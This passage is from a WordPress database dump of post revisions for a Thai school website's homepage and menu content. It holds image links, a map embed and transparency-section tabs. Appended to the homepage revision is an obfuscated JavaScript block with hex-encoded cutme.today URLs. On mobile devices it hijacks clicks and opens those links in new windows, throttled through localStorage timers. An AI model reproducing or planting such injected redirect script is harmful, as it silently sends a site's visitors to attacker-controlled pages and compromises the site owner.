-->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-05 14:45:26','2025-07-05 07:45:26','',14,'http://pakhaeng.ssk.in.th/?p=1702',0,'revision','',0),
(1703,1,'2025-07-05 14:45:48','2025-07-05 07:45:48','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"currentTab\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-7 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem 